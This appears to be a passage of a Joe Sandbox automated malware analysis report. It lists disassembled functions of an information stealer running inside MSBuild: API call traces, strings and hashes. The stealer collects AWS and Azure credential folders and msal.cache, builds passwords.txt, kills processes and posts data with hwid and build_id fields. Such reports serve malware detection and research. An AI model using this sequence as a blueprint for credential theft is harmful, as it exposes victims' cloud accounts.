InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 00406225
InternetCloseHandle.WININET(00000000), ref: 00406230
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405DFD

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

InternetCloseHandle.WININET(00000000), ref: 0040623A
InternetCloseHandle.WININET(00000000), ref: 00406247

Strings

", xrefs: 00405EB0, 00405FC0, 004060D1
build_id, xrefs: 00405F9E
mode, xrefs: 004060AF
------, xrefs: 00405CC2, 00405E03, 00405F15, 00406027

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$------$build_id$mode
API String ID: 530647464-3829489455
Opcode ID: ca39fe1fc220ddcbd9e97779eae753f342515fee96dcff701229d1bead8309d7
Instruction ID: 2342e7445195f74e1bbe978696abae846b25583d2ac747dccbea70769e672dee
Opcode Fuzzy Hash: ca39fe1fc220ddcbd9e97779eae753f342515fee96dcff701229d1bead8309d7
Instruction Fuzzy Hash: 1222EE72910108AEDB15FBA1DC92EEE7778AF54704F54817EB502724D1EF386A0DCBA8

Function 0040BF30 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 286
stringfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,00E50050,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C069
RtlAllocateHeap.NTDLL(00000000), ref: 0040C070
lstrlenA.KERNEL32(00000000,00000000), ref: 0040C10C
lstrcatA.KERNEL32(00000000,00E4EE18), ref: 0040C123
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C133
lstrcatA.KERNEL32(00000000,004234BC), ref: 0040C13F
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C14F

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1

lstrcatA.KERNEL32(00000000,004234B8), ref: 0040C15B
lstrcatA.KERNEL32(00000000,00E4EE88), ref: 0040C169
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C179
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C185
lstrcatA.KERNEL32(00000000,00E4EE28), ref: 0040C192
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1A2
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1AE
lstrcatA.KERNEL32(00000000,00E59380), ref: 0040C1BC
lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1CC
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1D8
lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1E4
lstrlenA.KERNEL32(00000000), ref: 0040C211
DeleteFileA.KERNEL32(00000000), ref: 0040C275

Strings

(, xrefs: 0040C18B
passwords.txt, xrefs: 0040C21E

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
String ID: ($passwords.txt
API String ID: 2344884248-2499039686
Opcode ID: 6c6631d7537a75886b13321184486968400d058f1e88fc6ffe80464b267e8130
Instruction ID: 967a70a3d716286beb5b4252a3fafd026a216bdc4be784f124d06add54286a45
Opcode Fuzzy Hash: 6c6631d7537a75886b13321184486968400d058f1e88fc6ffe80464b267e8130
Instruction Fuzzy Hash: DBA14D72A00105ABCB14FBA1ED5ADEE377DAF54305F149039F502B2591EF386A09CBB9

Function 00416350 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 121stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00416367

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

lstrcatA.KERNEL32(?,00000000), ref: 00416389
lstrcatA.KERNEL32(?,\.azure\), ref: 004163A3

Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415EBC
Part of subcall function 00415EA0: FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F3B
Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F67
Part of subcall function 00415EA0: PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,00E59F38,?,000003E8), ref: 00415FC3
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00415FE3
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00416009

memset.MSVCRT ref: 004163E0
lstrcatA.KERNEL32(?,00000000), ref: 00416408
lstrcatA.KERNEL32(?,\.aws\), ref: 00416422

Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F86
Part of subcall function 00415EA0: CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
Part of subcall function 00415EA0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119

memset.MSVCRT ref: 0041645F
lstrcatA.KERNEL32(?,00000000), ref: 00416487
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 004164A1

Part of subcall function 00415EA0: FindNextFileA.KERNEL32(?,?), ref: 00416160
Part of subcall function 00415EA0: FindClose.KERNEL32(?), ref: 00416172

memset.MSVCRT ref: 004164DE

Strings

Azure\.IdentityService, xrefs: 004164A7
2oA, xrefs: 004163C2, 00416441, 004164C0, 00416501, 004163C7, 00416446, 004164C5
\.IdentityService\, xrefs: 00416495
msal.cache, xrefs: 004164AC
*.*, xrefs: 004163AE, 0041642D
\.aws\, xrefs: 00416416
Azure\.azure, xrefs: 004163A9
Azure\.aws, xrefs: 00416428
\.azure\, xrefs: 00416397

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$2oA$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2861501092-331361937
Opcode ID: 38afecaf8fc192bfb163ca9d2791dc76124f7c879d6f20522884873c60bebab4
Instruction ID: 28d8bbb7bcea92de6612cba30d4fd1a0531622765afdd2ab7e90af46132b7da5
Opcode Fuzzy Hash: 38afecaf8fc192bfb163ca9d2791dc76124f7c879d6f20522884873c60bebab4
Instruction Fuzzy Hash: 04415172E4021866CB14FBB1DC47FED77786B48704F84486EB615620C1EBBCA78C8B59

Function 00407160 Relevance: 32.0, APIs: 21, Instructions: 482stringfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FA20: StrCmpCA.SHLWAPI(?,00423410,?,004090A5,00423410,00000000), ref: 0040FA2A

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040725E
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040744B
RtlAllocateHeap.NTDLL(00000000), ref: 00407452
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00407292

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

lstrcatA.KERNEL32(00000000,00000000,00000000,00E59E08,00423410,00E59E08,00423410,00000000), ref: 0040757D
lstrcatA.KERNEL32(00000000,0042340C), ref: 00407589
lstrcatA.KERNEL32(00000000,00000000), ref: 00407599
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075A5
lstrcatA.KERNEL32(00000000,00000000), ref: 004075B5
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075C1
lstrcatA.KERNEL32(00000000,00000000), ref: 004075D1
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075DD
lstrcatA.KERNEL32(00000000,00000000), ref: 004075ED
lstrcatA.KERNEL32(00000000,0042340C), ref: 004075F9
lstrcatA.KERNEL32(00000000,00000000), ref: 00407609
lstrcatA.KERNEL32(00000000,0042340C), ref: 00407615
lstrcatA.KERNEL32(00000000,00000000), ref: 00407652
lstrcatA.KERNEL32(00000000,00423408), ref: 00407666
lstrlenA.KERNEL32(00000000), ref: 004076B3
lstrlenA.KERNEL32(00000000), ref: 004076BF

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

DeleteFileA.KERNEL32(00000000,?,?,?,004201E9), ref: 0040771A

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$File$CopyHeap$AllocateDeleteProcess
String ID:
API String ID: 510441641-0
Opcode ID: b115433a796c70727ddb27c2892003f97d66e6a6fffaa7df257ef16394880564
Instruction ID: 7c427e6bb88bbe56a8d38efa81964618216df7dc27c3b8011e4d2415417106fc
Opcode Fuzzy Hash: b115433a796c70727ddb27c2892003f97d66e6a6fffaa7df257ef16394880564
Instruction Fuzzy Hash: 82026D72A10104ABCB24FBA1DC56DEE7779AF10305F54813AF506764E2EF386A0DCB69

Function 00408DD0 Relevance: 31.9, APIs: 21, Instructions: 390stringfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,00E50050,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408FC9
lstrcatA.KERNEL32(00000000,00000000,00E59E08,00423410,00E59E08,00423410,00000000), ref: 004090F3
lstrcatA.KERNEL32(00000000,0042340C), ref: 004090FF
lstrcatA.KERNEL32(00000000,00000000), ref: 0040910F
lstrcatA.KERNEL32(00000000,0042340C), ref: 0040911B
lstrcatA.KERNEL32(00000000,00000000), ref: 0040912B
lstrcatA.KERNEL32(00000000,0042340C), ref: 00409137
lstrcatA.KERNEL32(00000000,00000000), ref: 00409147
lstrcatA.KERNEL32(00000000,0042340C), ref: 00409153
lstrcatA.KERNEL32(00000000,00000000), ref: 00409163
lstrcatA.KERNEL32(00000000,0042340C), ref: 0040916F
lstrcatA.KERNEL32(00000000,00000000), ref: 0040917F
lstrcatA.KERNEL32(00000000,0042340C), ref: 0040918B
lstrcatA.KERNEL32(00000000,00000000), ref: 0040919B
lstrcatA.KERNEL32(00000000,00423408), ref: 004091A7
lstrlenA.KERNEL32(00000000), ref: 004091FC
lstrlenA.KERNEL32(00000000), ref: 00409208
RtlAllocateHeap.NTDLL(00000000), ref: 00408FD0

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1

DeleteFileA.KERNEL32(00000000), ref: 00409263

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
String ID:
API String ID: 2344884248-0
Opcode ID: 8a32bd120c3de7648835aa62839e96a1e8851a43be6b95bb348c2e23e5ccfc88
Instruction ID: 01af279fe34659f2e92758b1277113fc8cf4a0ef9ee58042c38a489971cdbd96
Opcode Fuzzy Hash: 8a32bd120c3de7648835aa62839e96a1e8851a43be6b95bb348c2e23e5ccfc88
Instruction Fuzzy Hash: 9AD13E72910504ABCB24FBA1DD56DEE7379AF54305F14813EF502724E2EF386A09CBA9

Function 00403E20 Relevance: 30.2, APIs: 13, Strings: 4, Instructions: 457networkfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,00000030), ref: 00403EC7
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040400D
HttpOpenRequestA.WININET(00000000,00E59F78,?,00E5ADC8,00000000,00000000,-00400100,00000000), ref: 00404048
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040406C

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

lstrlenA.KERNEL32(00000000,00000000,?,?,00416B92,?,004201E9,00000000,00416B92,?,00000000,00416B92,",00000000,00416B92,build_id), ref: 004042BD
lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 004042D6
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004042E7
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004042FE
InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 0040434A
InternetCloseHandle.WININET(00000000), ref: 00404355
InternetCloseHandle.WININET(?), ref: 00404367
InternetCloseHandle.WININET(00000000), ref: 00404371

Strings

hwid, xrefs: 004040FA
", xrefs: 0040411C, 0040422C
build_id, xrefs: 0040420A
------, xrefs: 00403F32, 00404072, 00404181

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
String ID: "$------$build_id$hwid
API String ID: 1585128682-50533134
Opcode ID: d0a5a0a515663f665d08bbeb1d1109fba58a5cce67514d4fc39d3ba5028ee652
Instruction ID: b133d135036fceaf129ec02b97349a15de150af5b357d63d1a2f8011ac320ed4
Opcode Fuzzy Hash: d0a5a0a515663f665d08bbeb1d1109fba58a5cce67514d4fc39d3ba5028ee652
Instruction Fuzzy Hash: 7DF1FE72910108AEDB15FBA1DC92EEE7378AF54704F54817EB112724D1EF386A0DCBA8

Function 00412000 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 295stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0041202B
lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,00000104), ref: 004120C1
lstrcpyA.KERNEL32(?,00000000), ref: 004120FA
lstrcpyA.KERNEL32(?,00000000), ref: 0041213C
lstrcpyA.KERNEL32(?,00000000), ref: 0041217E
lstrcpyA.KERNEL32(?,00000000), ref: 004121BF
StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412322
strtok_s.MSVCRT ref: 004123AC

Strings

false, xrefs: 0041233C
true, xrefs: 0041231C
anA, xrefs: 0041200E, 004123A6, 00412016, 004123A9

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
